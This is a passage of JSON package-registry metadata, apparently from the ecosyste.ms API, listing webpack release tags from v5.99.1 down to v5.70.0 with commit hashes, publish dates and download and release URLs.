ack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7